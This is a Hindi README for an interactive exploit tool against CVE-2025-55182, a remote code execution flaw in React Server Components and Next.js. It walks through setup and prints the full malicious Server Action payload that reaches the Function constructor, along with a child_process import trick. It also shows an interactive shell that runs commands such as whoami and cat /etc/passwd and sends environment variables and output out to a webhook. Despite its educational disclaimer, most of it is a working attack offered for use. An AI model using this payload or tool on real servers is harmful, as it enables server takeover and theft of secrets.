
CVE-2025-55182 इंटरैक्टिव PoC - React Server Components RCE - शैक्षिक सुरक्षा अनुसंधान
CVE-2025-55182 का शोषण करने के लिए इंटरएक्टिव शेल, जो React Server Components में एक Remote Code Execution कमजोरी है।
यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
CVE-2025-55182 निम्नलिखित में React Server Components (RSC) को प्रभावित करता है:
यह भेद्यता सर्वर एक्शन में भेजे गए दुर्भावनापूर्ण पेलोड के माध्यम से Remote Code Execution (RCE) की अनुमति देती है।
$@x सिंटैक्स का उपयोग करता है.then() विधियों वाले ऑब्जेक्ट्स को अनरैप करता है (Promise जैसे)_response, _formData, और _prefix गुणों वाला एक दुर्भावनापूर्ण पेलोड तैयार करकेFunction कंस्ट्रक्टर तक पहुँच सकता है$3:constructor:constructor → Function constructor → RCE
git clone https://github.com/NathanJ60/react2shell-interactive.git
cd react2shell-interactive
npm install
exploit.js संपादित करें और इन मानों को अपडेट करें:
const TARGET_URL = 'http://localhost:3000/' // Vulnerable Next.js server
const WEBHOOK_URL = 'https://webhook.site/YOUR-ID' // Your webhook URL
https://webhook.site पर एक मुफ्त वेबहुक प्राप्त करें।
node exploit.js
react2shell> !test
[+] Sent! Check webhook
react2shell> whoami
[+] Sent: whoami
react2shell> ls -la
[+] Sent: ls -la
react2shell> !env
[+] Sent! Check webhook for env vars
परिणाम आपके वेबहुक पर दिखाई देते हैं, टर्मिनल पर नहीं।
{
'0': '$1',
'1': {
'status': 'resolved_model',
'reason': 0,
'_response': '$4',
'value': '{"then":"$3:map","0":{"then":"$B3"},"length":1}',
'then': '$2:then'
},
'2': '$@3',
'3': [],
'4': {
'_prefix': '<JAVASCRIPT_CODE>//',
'_formData': { 'get': '$3:constructor:constructor' },
'_chunks': '$2:_response:_chunks'
}
}
next-action हेडर के साथ मल्टीपार्ट फॉर्म डेटा के रूप में भेजा जाता है$@3 एक Chunk संदर्भ बनाता है$3:constructor:constructor Function तक ट्रैवर्स करता है_prefix सामग्री Function() को पास की जाती है और निष्पादित की जाती हैrequire() उपलब्ध नहीं हैimport() का उपयोग करें:
import("child_process").then(cp => cp.execSync("whoami"))
भेद्यता को ठीक करने के लिए इन संस्करणों में अपडेट करें:
MIT लाइसेंस - केवल शैक्षिक उद्देश्यों के लिए।
सुरक्षा अनुसंधान PoC - जिम्मेदारी से उपयोग करें।
| कमांड | विवरण |
|---|
!test | जांचें कि एक्सप्लॉइट काम करता है (वेबहुक पर पुष्टि भेजता है) |
!env | पर्यावरण चर (process.env) निकालें |
!js <code> | कस्टम JavaScript निष्पादित करें |
!help | सहायता दिखाएं |
!exit | बाहर निकलें |
<command> | शेल कमांड निष्पादित करें (जैसे, whoami, ls, cat /etc/passwd) |